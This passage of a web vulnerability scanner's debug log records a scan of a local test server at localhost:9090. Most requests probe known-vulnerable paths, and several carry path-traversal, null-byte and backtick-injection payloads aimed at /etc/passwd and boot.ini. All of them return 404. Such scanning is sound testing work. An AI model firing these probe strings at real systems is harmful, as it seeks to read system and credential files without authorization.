(id=24737,from_cache=0,grep=1,rtt=0.03,did=IR2oLScv) [Wed Feb 12 10:04:36 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13084, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4962} [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/_vti_bin/contents.htm returned HTTP code "404" (id=24739,from_cache=0,grep=1,rtt=0.09,did=u9eHQYsF) [Wed Feb 12 10:04:36 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13084, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4962} [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/texis/websearch/phine returned HTTP code "404" (id=24742,from_cache=0,grep=1,rtt=0.06,did=GqcbQhLZ) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/examples/include1 returned HTTP code "404" (id=24743,from_cache=0,grep=1,rtt=0.04,did=EyiBngxR) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/servlet/SnoopServlet returned HTTP code "404" (id=24744,from_cache=0,grep=1,rtt=0.20,did=DUREoD0I) [Wed Feb 12 10:04:36 2020 - debug] localhost:9090 connection pool stats (free:310 / in_use:9 / max:50 / total:319) [Wed Feb 12 10:04:36 2020 - debug] Connections with more in use time: (f5db311abe562806, 0.15 sec) (d6d46eca7bc23479, 0.12 sec) (768418029b34e139, 0.12 sec) (1d8760f7cff61578, 0.08 sec) (1f2fc9040aaeca7e, 0.08 sec) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/.addressbook returned HTTP code "404" (id=24740,from_cache=0,grep=1,rtt=0.25,did=zk4tno2X) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/.plan returned HTTP code "404" (id=24746,from_cache=0,grep=1,rtt=0.11,did=gOrrrtKw) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/scripts/cfgwiz.exe returned HTTP code "404" (id=24747,from_cache=0,grep=1,rtt=0.06,did=pYO5b8nr) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/quikstore.cfg returned HTTP code "404" (id=24748,from_cache=0,grep=1,rtt=0.63,did=PptSEjDE) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/imprimer.asp?no=/etc/passwd\x00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24741,from_cache=0,grep=1,rtt=0.79,did=NHptt0Da) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/pt_config.inc returned HTTP code "404" (id=24731,from_cache=0,grep=1,rtt=0.68,did=93LCSIpi) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/cfgwiz.exe returned HTTP code "404" (id=24732,from_cache=0,grep=1,rtt=0.12,did=rkpnoaFh) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24733,from_cache=0,grep=1,rtt=0.75,did=l5C83sUg) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/index.html.no returned HTTP code "404" (id=24738,from_cache=0,grep=1,rtt=0.08,did=r1OzT0hq) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/bbs_forum.cgi returned HTTP code "404" (id=24751,from_cache=0,grep=1,rtt=0.05,did=65kalqG7) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/cgi-test.exe returned HTTP code "404" (id=24749,from_cache=0,grep=1,rtt=0.02,did=M2qcU18o) [Wed Feb 12 10:04:36 2020 - debug] url_session.grep(uri="http://localhost:9090/03/") took 0.32s to run [Wed Feb 12 10:04:36 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_reason.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] cache_control.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_headers.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] ssn.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] oracle.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] feeds.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] error_pages.grep(uri="http://localhost:9090/03/") took 0.02s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/ncommerce3/ExecMacro/macro.d2w/\n\n returned HTTP code "404" (id=24745,from_cache=0,grep=1,rtt=0.10,did=GmIE80id) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/useraction.php3 returned HTTP code "404" (id=24752,from_cache=0,grep=1,rtt=0.13,did=n34vSp2C) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/login.php3?reason=chpass2 returned HTTP code "404" (id=24750,from_cache=0,grep=1,rtt=0.10,did=2Sj1vpFo) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2463. [Wed Feb 12 10:04:36 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/03/") took 0.09s to run [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/imprimer.asp?no=`/etc/passwd`|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24755,from_cache=0,grep=1,rtt=0.20,did=F5qDBrnF) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/pls/simpledad/admin_/globalsettings.htm returned HTTP code "404" (id=24753,from_cache=0,grep=1,rtt=0.14,did=BOvX12Vl) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4523. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2464. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4523. [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/servlet/AdminServlet returned HTTP code "404" (id=24754,from_cache=0,grep=1,rtt=0.17,did=ktiO4dRw) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2465. [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/_vti_pvt/users.pwd returned HTTP code "404" (id=24757,from_cache=0,grep=1,rtt=0.15,did=lrCqN8HH) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2466. [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/webmail/src/read_body.php returned HTTP code "404" (id=24756,from_cache=0,grep=1,rtt=0.22,did=5ucftNyc) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24700,from_cache=0,grep=1,rtt=0.06,did=HzT8fdJL) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2467. [Wed Feb 12 10:04:36 2020 - debug] symfony.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] svn_users.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] expect_ct.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] private_ip.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] motw.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] meta_generator.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] retirejs.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/.htaccess.save returned HTTP code "404" (id=24759,from_cache=0,grep=1,rtt=0.09,did=RRg3rMW5) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/texis/phine returned HTTP code "404" (id=24758,from_cache=0,grep=1,rtt=0.08,did=BXvpijqS) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/csPassword/csPassword.cgi returned HTTP code "404" (id=24760,from_cache=0,grep=1,rtt=0.18,did=eATC5F2Y) [Wed Feb 12 10:04:36 2020 - debug] file_upload.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/newtopic.php returned HTTP code "404" (id=24761,from_cache=0,grep=1,rtt=0.13,did=b3JoBnSn) [Wed Feb 12 10:04:36 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/modules/WebChat/users.php returned HTTP code "404" (id=24762,from_cache=0,grep=1,rtt=0.08,did=XEdGFcTx) [Wed Feb 12 10:04:36 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/commandit.cgi returned HTTP code "404" (id=24763,from_cache=0,grep=1,rtt=0.04,did=ptGidENd) [Wed Feb 12 10:04:36 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:36 2020 - debug] serialized_object.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] blank_body.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] credit_cards.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] websockets_links.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4524. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2468. [Wed Feb 12 10:04:36 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] csp.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] clamav.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] dom_xss.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] vulners_db.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] url_session.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2469. [Wed Feb 12 10:04:36 2020 - debug] keys.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] objects.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] error_500.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] meta_tags.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] password_profiling.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] click_jacking.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/amadmin.pl returned HTTP code "404" (id=24764,from_cache=0,grep=1,rtt=0.07,did=R3Rs3fw6) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/productcart/database/EIPC.mdb returned HTTP code "404" (id=24765,from_cache=0,grep=1,rtt=0.29,did=7Kj4SQuk) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/mc-icons/ returned HTTP code "404" (id=24766,from_cache=0,grep=1,rtt=0.14,did=F0JsyQ9Z) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/modif_infos.asp?n=/../../../../../../../../../etc/passwd returned HTTP code "404" (id=24767,from_cache=0,grep=1,rtt=0.31,did=RHFqx2CN) [Wed Feb 12 10:04:36 2020 - debug] lang.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_reason.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] cache_control.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_headers.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] ssn.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] oracle.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] feeds.grep(uri="http://localhost:9090/img/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] error_pages.grep(uri="http://localhost:9090/img/") took 0.02s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/index.html.tw returned HTTP code "404" (id=24768,from_cache=0,grep=1,rtt=0.05,did=wJYfbWnc) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/ezshopper3/loadpage.cgi returned HTTP code "404" (id=24769,from_cache=0,grep=1,rtt=0.10,did=7sMO3CBm) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4524. [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/functions.inc.php returned HTTP code "404" (id=24770,from_cache=0,grep=1,rtt=0.19,did=Sicev3wM) [Wed Feb 12 10:04:36 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/img/") took 0.06s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/build.cgi returned HTTP code "404" (id=24772,from_cache=0,grep=1,rtt=0.01,did=K7QccSz9) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/bin/fpsrvadm.exe returned HTTP code "404" (id=24774,from_cache=0,grep=1,rtt=0.05,did=jk5sMbRO) [Wed Feb 12 10:04:36 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 10:04:36 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: X1OtrmPP) [Wed Feb 12 10:04:36 2020 - debug] symfony.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/pvote/add.php?question=AmIgAy&=&=&=&=&o1=yes&o2=yeah&o3=well..yeah&o4=bad returned HTTP code "404" (id=24773,from_cache=0,grep=1,rtt=0.03,did=AFhNTNN1) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/sendphoto.php returned HTTP code "404" (id=24771,from_cache=0,grep=1,rtt=0.10,did=eP318zOj) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2470. [Wed Feb 12 10:04:36 2020 - debug] localhost:9090 connection pool stats (free:316 / in_use:5 / max:50 / total:321) [Wed Feb 12 10:04:36 2020 - debug] Connections with more in use time: (b2c1d6d4c80b007c, 0.17 sec) (768418029b34e139, 0.14 sec) (d76d3a9ccfaaa804, 0.05 sec) (fc8ff48ebd25abd4, 0.02 sec) (f7a1191f867c5696, 0.01 sec) [Wed Feb 12 10:04:36 2020 - debug] file_upload.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2471. [Wed Feb 12 10:04:36 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] expect_ct.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] svn_users.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] private_ip.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] motw.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] meta_generator.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] retirejs.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:36 2020 - debug] serialized_object.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] blank_body.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] credit_cards.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] websockets_links.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] csp.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] dom_xss.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] vulners_db.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] keys.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2472. [Wed Feb 12 10:04:36 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] clamav.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/mod_ose_docs returned HTTP code "404" (id=24778,from_cache=0,grep=1,rtt=0.09,did=dT8oqmah) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/test/jsp/declaration/IntegerOverflow.jsp returned HTTP code "404" (id=24777,from_cache=0,grep=1,rtt=0.08,did=lPMxnuU9) [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/test/jsp/pageIsErrorPage.jsp returned HTTP code "404" (id=24785,from_cache=0,grep=1,rtt=0.09,did=8scKCmVo) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/scripts/CGImail.exe returned HTTP code "404" (id=24786,from_cache=0,grep=1,rtt=0.11,did=HLpojU0Z) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/_private/register.htm returned HTTP code "404" (id=24788,from_cache=0,grep=1,rtt=0.18,did=8AlUn3rP) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/_vti_bin/fpadmin.htm returned HTTP code "404" (id=24790,from_cache=0,grep=1,rtt=0.08,did=EogqAnRa) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/index.html.ca returned HTTP code "404" (id=24792,from_cache=0,grep=1,rtt=0.07,did=167VZvR9) [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/register.cgi returned HTTP code "404" (id=24781,from_cache=0,grep=1,rtt=0.07,did=p5D1h9zA) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/site_searcher.cgi returned HTTP code "404" (id=24775,from_cache=0,grep=1,rtt=0.07,did=4EPOOslB) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/index.html.he.iso8859-8 returned HTTP code "404" (id=24784,from_cache=0,grep=1,rtt=0.09,did=Jvdt6Ac5) [Wed Feb 12 10:04:36 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13132, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4964} [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/basilix/ returned HTTP code "404" (id=24789,from_cache=0,grep=1,rtt=0.17,did=ep1YlpxX) [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/tinymsg.php returned HTTP code "404" (id=24795,from_cache=0,grep=1,rtt=0.14,did=bUpAk4a5) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/mod.php returned HTTP code "404" (id=24779,from_cache=0,grep=1,rtt=0.12,did=9d9tY4qn) [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/counter-ord returned HTTP code "404" (id=24783,from_cache=0,grep=1,rtt=0.04,did=34fAsoar) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24782,from_cache=0,grep=1,rtt=0.02,did=rM0T6k7T) [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24787,from_cache=0,grep=1,rtt=0.02,did=2mg8AXag) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/Cgitest.exe returned HTTP code "404" (id=24794,from_cache=0,grep=1,rtt=0.03,did=iBkqzDMT) [Wed Feb 12 10:04:36 2020 - debug] localhost:9090 connection pool stats (free:321 / in_use:3 / max:50 / total:324) [Wed Feb 12 10:04:36 2020 - debug] Connections with more in use time: (f7a1191f867c5696, 0.20 sec) (768418029b34e139, 0.10 sec) (b0d7a78f546ac6a2, 0.08 sec) (5826a716c5ea764a, 0.07 sec) (f9ecde0d136f989a, 0.06 sec) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/examples/info returned HTTP code "404" (id=24791,from_cache=0,grep=1,rtt=0.10,did=vq7FEKAk) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/xdk/ returned HTTP code "404" (id=24776,from_cache=0,grep=1,rtt=0.08,did=TXatmzrb) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/manual/servlets/scripts/servlet1/servform.htm returned HTTP code "404" (id=24793,from_cache=0,grep=1,rtt=0.10,did=UbKixxxM) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse= returned HTTP code "404" (id=24780,from_cache=0,grep=1,rtt=0.07,did=EBVLGNCg) [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/.bashrc returned HTTP code "404" (id=24796,from_cache=0,grep=1,rtt=0.07,did=sOGFQ03b) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/index.html.po.iso8859-2 returned HTTP code "404" (id=24797,from_cache=0,grep=1,rtt=0.03,did=b7AWAk57) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2473. [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/image/ returned HTTP code "404" (id=24798,from_cache=0,grep=1,rtt=0.14,did=F1lvAxSD) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4523. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2474. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4523. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2475. [Wed Feb 12 10:04:36 2020 - debug] url_session.grep(uri="http://localhost:9090/t/") took 0.01s to run [Wed Feb 12 10:04:36 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] objects.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] error_500.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] meta_tags.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4524. [Wed Feb 12 10:04:36 2020 - debug] password_profiling.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] click_jacking.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/t/") took 0.00s to 